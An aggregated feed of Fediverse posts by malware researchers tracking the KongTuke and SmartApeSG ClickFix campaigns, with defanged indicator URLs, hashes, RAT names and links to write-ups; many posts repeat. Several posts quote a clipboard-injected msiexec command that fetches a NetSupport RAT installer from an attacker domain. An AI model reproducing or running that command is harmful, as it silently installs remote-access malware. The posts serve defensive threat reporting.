home.social

#kongtuke — Public Fediverse posts

Live and recent posts from across the Fediverse tagged #kongtuke, aggregated by home.social.

  1. i've got a new malware analysis describing what i have dubbed XorBee RAT

    • delivered by #kongtuke via #clickfix
    • Python based
    • targets domain-joined Windows
    • uses port tcp/4444 for C2 traffic
    • obfuscates C2 traffic with XOR of the letter b
    • continuously runs a thread checking for monitoring tools and exists if seen
    • after authenticating with C2, enters reverse shell
    • related to ModeloRAT
    • first seen in October 2025

    rmceoin.github.io/malware-anal

    #xorbee

  2. 2026-04-09 (Thursday): Finally got the #KongTuke CAPTCHA page and associated #ClickFix instructions today!

    KongTuke CAPTCHA page traffic:

    - hxxps[:]//windlrr[.]com/file.js
    - hxxps[:]//windlrr[.]com/t
    - hxxps[:]//windlrr[.]com/g
    - hxxps[:]//windlrr[.]com/g
    - hxxps[:]//windlrr[.]com/c?tk=a19806998b1234b63f73ef741e1b749d

    URL from clipboard-injected script:

    - hxxps[:]//oeannon[.]com/t2?tk=5f7edb3752dd5b85eda86711724abd44

    Last URL I got on a VM (nothing returned):

    - hxxps[:]//plein-soleil[.]top/o

  3. 2026-04-09 (Thursday): I found a site with inject script for both the #KongTuke and #SmartApeSG campaigns. Only got #SmartApeSG

    Zip archive payload: c0d91df99b279ebfd952dadf0d1b94e436defa6bb59752cfad13777187f88553

    Saw the same possible data exfiltration traffic to the same server at 89.110.110[.]119:443 that I saw from the previous payload from SmartApeSG campaign I reported on Monday 2026-04-06.

  4. 2026-04-09 (Thursday): I found a site with inject script for both the #KongTuke and #SmartApeSG campaigns. Only got #SmartApeSG

    Zip archive payload: c0d91df99b279ebfd952dadf0d1b94e436defa6bb59752cfad13777187f88553

    Saw the same possible data exfiltration traffic to the same server at 89.110.110[.]119:443 that I saw from the previous payload from SmartApeSG campaign I reported on Monday 2026-04-06.

  5. NOTE: This has been updated to correct the malware names. Thanks, @netresec!

    2026-02-02 (Monday) #KongTuke #ClickFix activity leads to #MintsLoader and #GhostWeaver #RAT

    Today, the ClickFix text uses the "finger" command, which is a tactic used by KongTuke and other ClickFix campaigns in previous weeks/months.

    A #pcap of the infection traffic, some artifacts, and further details are available at malware-traffic-analysis.net/2

  6. NOTE: This has been updated to correct the malware names. Thanks, @netresec!

    2026-02-02 (Monday) #KongTuke #ClickFix activity leads to #MintsLoader and #GhostWeaver #RAT

    Today, the ClickFix text uses the "finger" command, which is a tactic used by KongTuke and other ClickFix campaigns in previous weeks/months.

    A #pcap of the infection traffic, some artifacts, and further details are available at malware-traffic-analysis.net/2

  7. NOTE: This has been updated to correct the malware names. Thanks, @netresec!

    2026-02-02 (Monday) #KongTuke #ClickFix activity leads to #MintsLoader and #GhostWeaver #RAT

    Today, the ClickFix text uses the "finger" command, which is a tactic used by KongTuke and other ClickFix campaigns in previous weeks/months.

    A #pcap of the infection traffic, some artifacts, and further details are available at malware-traffic-analysis.net/2

  8. NOTE: This has been updated to correct the malware names. Thanks, @netresec!

    2026-02-02 (Monday) #KongTuke #ClickFix activity leads to #MintsLoader and #GhostWeaver #RAT

    Today, the ClickFix text uses the "finger" command, which is a tactic used by KongTuke and other ClickFix campaigns in previous weeks/months.

    A #pcap of the infection traffic, some artifacts, and further details are available at malware-traffic-analysis.net/2

  9. NOTE: This has been updated to correct the malware names. Thanks, @netresec!

    2026-02-02 (Monday) #KongTuke #ClickFix activity leads to #MintsLoader and #GhostWeaver #RAT

    Today, the ClickFix text uses the "finger" command, which is a tactic used by KongTuke and other ClickFix campaigns in previous weeks/months.

    A #pcap of the infection traffic, some artifacts, and further details are available at malware-traffic-analysis.net/2

  10. 📣 🚨 #KongTuke hacker group cloned a #Chrome ad blocker to trick users into installing spyware which also launched DoS attacks, crashed browsers, and dropped ModeloRAT.

    Read: hackread.com/clickfix-crashfix

    #CyberSecurity #Malware #ModeloRAT #ClickFix #CrashFix

  11. 📣 🚨 hacker group cloned a ad blocker to trick users into installing spyware which also launched DoS attacks, crashed browsers, and dropped ModeloRAT.

    Read: hackread.com/clickfix-crashfix

  12. 📣 🚨 #KongTuke hacker group cloned a #Chrome ad blocker to trick users into installing spyware which also launched DoS attacks, crashed browsers, and dropped ModeloRAT.

    Read: hackread.com/clickfix-crashfix

    #CyberSecurity #Malware #ModeloRAT #ClickFix #CrashFix

  13. 📣 🚨 #KongTuke hacker group cloned a #Chrome ad blocker to trick users into installing spyware which also launched DoS attacks, crashed browsers, and dropped ModeloRAT.

    Read: hackread.com/clickfix-crashfix

    #CyberSecurity #Malware #ModeloRAT #ClickFix #CrashFix

  14. 📣 🚨 #KongTuke hacker group cloned a #Chrome ad blocker to trick users into installing spyware which also launched DoS attacks, crashed browsers, and dropped ModeloRAT.

    Read: hackread.com/clickfix-crashfix

    #CyberSecurity #Malware #ModeloRAT #ClickFix #CrashFix

  15. 2026-01-08 (Thursday): Got a full infection from #KongTuke campaign #ClickFix activity today.

    I split the traffic from this infection into two #pcap files, and the second one is over 200 MB, because of the malware download.

    Pcap files, the associated malware, artifacts, and further information is available at malware-traffic-analysis.net/2

  16. I finished compiling the information for #Kongtuke #ClickFix activity using the finger command on 2025-12-11, and it's now live at www.malware-traffic-analysis.net/2025/12/11/index2.html

    I'd already posted the #SmartApeSG ClickFix activity using finger that same day, so now both are available.

    I had to run the ClickFix command on a physical host because the C2 server didn't like me when I initially tried it on a VM.

    Post-infection traffic looks like the same type of #AsyncRAT I've seen before, and some Tor traffic from whatever the follow-up malware is.

    It's a 221 MB zip archive containing the #pcap for the full infection, and it's about the same size as the zip archive containing forensic artifacts from the infected host.

  17. I finished compiling the information for #Kongtuke #ClickFix activity using the finger command on 2025-12-11, and it's now live at www.malware-traffic-analysis.net/2025/12/11/index2.html

    I'd already posted the #SmartApeSG ClickFix activity using finger that same day, so now both are available.

    I had to run the ClickFix command on a physical host because the C2 server didn't like me when I initially tried it on a VM.

    Post-infection traffic looks like the same type of #AsyncRAT I've seen before, and some Tor traffic from whatever the follow-up malware is.

    It's a 221 MB zip archive containing the #pcap for the full infection, and it's about the same size as the zip archive containing forensic artifacts from the infected host.

  18. I finished compiling the information for #Kongtuke #ClickFix activity using the finger command on 2025-12-11, and it's now live at www.malware-traffic-analysis.net/2025/12/11/index2.html

    I'd already posted the #SmartApeSG ClickFix activity using finger that same day, so now both are available.

    I had to run the ClickFix command on a physical host because the C2 server didn't like me when I initially tried it on a VM.

    Post-infection traffic looks like the same type of #AsyncRAT I've seen before, and some Tor traffic from whatever the follow-up malware is.

    It's a 221 MB zip archive containing the #pcap for the full infection, and it's about the same size as the zip archive containing forensic artifacts from the infected host.

  19. I finished compiling the information for #Kongtuke #ClickFix activity using the finger command on 2025-12-11, and it's now live at www.malware-traffic-analysis.net/2025/12/11/index2.html

    I'd already posted the #SmartApeSG ClickFix activity using finger that same day, so now both are available.

    I had to run the ClickFix command on a physical host because the C2 server didn't like me when I initially tried it on a VM.

    Post-infection traffic looks like the same type of #AsyncRAT I've seen before, and some Tor traffic from whatever the follow-up malware is.

    It's a 221 MB zip archive containing the #pcap for the full infection, and it's about the same size as the zip archive containing forensic artifacts from the infected host.

  20. 2025-09-22 (Monday): #SmartApeSG using #FileFix style #ClickFix technique on its fake CAPTCHA page.

    While #KongTuke has reportedly used FileFix, this is the first time I've seen it from SmartApeSG sites.

    #clipboardhijacking Script injected into clipboard:

    msiexec /i hxxps[:]//founderevo[.]com/res/velvet ISLANDABSTRACT=surgewarfare.bat /qn

    The downloaded file is an MSI for #NetSupportRAT

    virustotal.com/gui/file/958586

  21. 2025-09-22 (Monday): #SmartApeSG using #FileFix style #ClickFix technique on its fake CAPTCHA page.

    While #KongTuke has reportedly used FileFix, this is the first time I've seen it from SmartApeSG sites.

    #clipboardhijacking Script injected into clipboard:

    msiexec /i hxxps[:]//founderevo[.]com/res/velvet ISLANDABSTRACT=surgewarfare.bat /qn

    The downloaded file is an MSI for #NetSupportRAT

    virustotal.com/gui/file/958586

  22. 2025-09-22 (Monday): #SmartApeSG using #FileFix style #ClickFix technique on its fake CAPTCHA page.

    While #KongTuke has reportedly used FileFix, this is the first time I've seen it from SmartApeSG sites.

    #clipboardhijacking Script injected into clipboard:

    msiexec /i hxxps[:]//founderevo[.]com/res/velvet ISLANDABSTRACT=surgewarfare.bat /qn

    The downloaded file is an MSI for #NetSupportRAT

    virustotal.com/gui/file/958586

  23. 2025-09-22 (Monday): #SmartApeSG using #FileFix style #ClickFix technique on its fake CAPTCHA page.

    While #KongTuke has reportedly used FileFix, this is the first time I've seen it from SmartApeSG sites.

    #clipboardhijacking Script injected into clipboard:

    msiexec /i hxxps[:]//founderevo[.]com/res/velvet ISLANDABSTRACT=surgewarfare.bat /qn

    The downloaded file is an MSI for #NetSupportRAT

    virustotal.com/gui/file/958586

  24. 2025-09-22 (Monday): #SmartApeSG using #FileFix style #ClickFix technique on its fake CAPTCHA page.

    While #KongTuke has reportedly used FileFix, this is the first time I've seen it from SmartApeSG sites.

    #clipboardhijacking Script injected into clipboard:

    msiexec /i hxxps[:]//founderevo[.]com/res/velvet ISLANDABSTRACT=surgewarfare.bat /qn

    The downloaded file is an MSI for #NetSupportRAT

    virustotal.com/gui/file/958586

  25. 2025-08-20 (Wed): #Kongtuke still using #FileFix style #ClickFix instructions on its fake CAPTCHA pages.

    I never got any further than the HTTP POST request that sends information about the infected system host.

    Details at: github.com/malware-traffic/ind

  26. 2025-08-20 (Wed): #Kongtuke still using #FileFix style #ClickFix instructions on its fake CAPTCHA pages.

    I never got any further than the HTTP POST request that sends information about the infected system host.

    Details at: github.com/malware-traffic/ind

  27. 2025-08-20 (Wed): #Kongtuke still using #FileFix style #ClickFix instructions on its fake CAPTCHA pages.

    I never got any further than the HTTP POST request that sends information about the infected system host.

    Details at: github.com/malware-traffic/ind

  28. 2025-08-20 (Wed): #Kongtuke still using #FileFix style #ClickFix instructions on its fake CAPTCHA pages.

    I never got any further than the HTTP POST request that sends information about the infected system host.

    Details at: github.com/malware-traffic/ind

  29. 2025-08-20 (Wed): #Kongtuke still using #FileFix style #ClickFix instructions on its fake CAPTCHA pages.

    I never got any further than the HTTP POST request that sends information about the infected system host.

    Details at: github.com/malware-traffic/ind

  30. Example 2: #FileFix

    As of 2025-07-03, the #KongTuke campaign is using FileFix style #ClickFix pages to distribute whatever this campaign is distributing.

    It's likely pushing #InterlockRAT based on previous discussions I've had here, but I couldn't confirm, because it didn't like me.

  31. Example 2: #FileFix

    As of 2025-07-03, the #KongTuke campaign is using FileFix style #ClickFix pages to distribute whatever this campaign is distributing.

    It's likely pushing #InterlockRAT based on previous discussions I've had here, but I couldn't confirm, because it didn't like me.

  32. Social media post I wrote for my employer on other platforms.

    2025-04-04 (Friday): Injected #KongTuke script in pages from legitimate but compromised websites leads to fake #CAPTCHA style pages and #ClipboardHijacking (#pastejacking). These pages ask users to paste script into a Run window. Latest info at

    Information from an infection run earlier today at github.com/PaloAltoNetworks/Un

    Of note, we can find legitimate websites with the injected hashtag#KongTuke script by pivoting on the KongTuke domain in URLscan:

    urlscan.io/search/#lancasternh

  33. Social media post I wrote for my employer on other platforms.

    2025-04-04 (Friday): Injected #KongTuke script in pages from legitimate but compromised websites leads to fake #CAPTCHA style pages and #ClipboardHijacking (#pastejacking). These pages ask users to paste script into a Run window. Latest info at

    Information from an infection run earlier today at github.com/PaloAltoNetworks/Un

    Of note, we can find legitimate websites with the injected hashtag#KongTuke script by pivoting on the KongTuke domain in URLscan:

    urlscan.io/search/#lancasternh

  34. Social media post I wrote for my employer on other platforms.

    2025-04-04 (Friday): Injected #KongTuke script in pages from legitimate but compromised websites leads to fake #CAPTCHA style pages and #ClipboardHijacking (#pastejacking). These pages ask users to paste script into a Run window. Latest info at

    Information from an infection run earlier today at github.com/PaloAltoNetworks/Un

    Of note, we can find legitimate websites with the injected hashtag#KongTuke script by pivoting on the KongTuke domain in URLscan:

    urlscan.io/search/#lancasternh

  35. Social media post I wrote for my employer on other platforms.

    2025-04-04 (Friday): Injected #KongTuke script in pages from legitimate but compromised websites leads to fake #CAPTCHA style pages and #ClipboardHijacking (#pastejacking). These pages ask users to paste script into a Run window. Latest info at

    Information from an infection run earlier today at github.com/PaloAltoNetworks/Un

    Of note, we can find legitimate websites with the injected hashtag#KongTuke script by pivoting on the KongTuke domain in URLscan:

    urlscan.io/search/#lancasternh

  36. Social media post I wrote for my employer on other platforms.

    2025-04-04 (Friday): Injected #KongTuke script in pages from legitimate but compromised websites leads to fake #CAPTCHA style pages and #ClipboardHijacking (#pastejacking). These pages ask users to paste script into a Run window. Latest info at

    Information from an infection run earlier today at github.com/PaloAltoNetworks/Un

    Of note, we can find legitimate websites with the injected hashtag#KongTuke script by pivoting on the KongTuke domain in URLscan:

    urlscan.io/search/#lancasternh

  37. 025-01-28 (Tuesday): A case of web injects--malicious script injected into compromised websites. In this example, a compromised site has two instances of injected script.

    One inject script is #KongTuke that leads to a fake CAPTCHA page, which is something that I and many others have discussed previously.

    The other injected script leads to a #SocGholish style fake browser update page.

    For a#pcap of the infection traffic, malware and other files from the activity, and the indicators of compromise (IOCs), see malware-traffic-analysis.net/2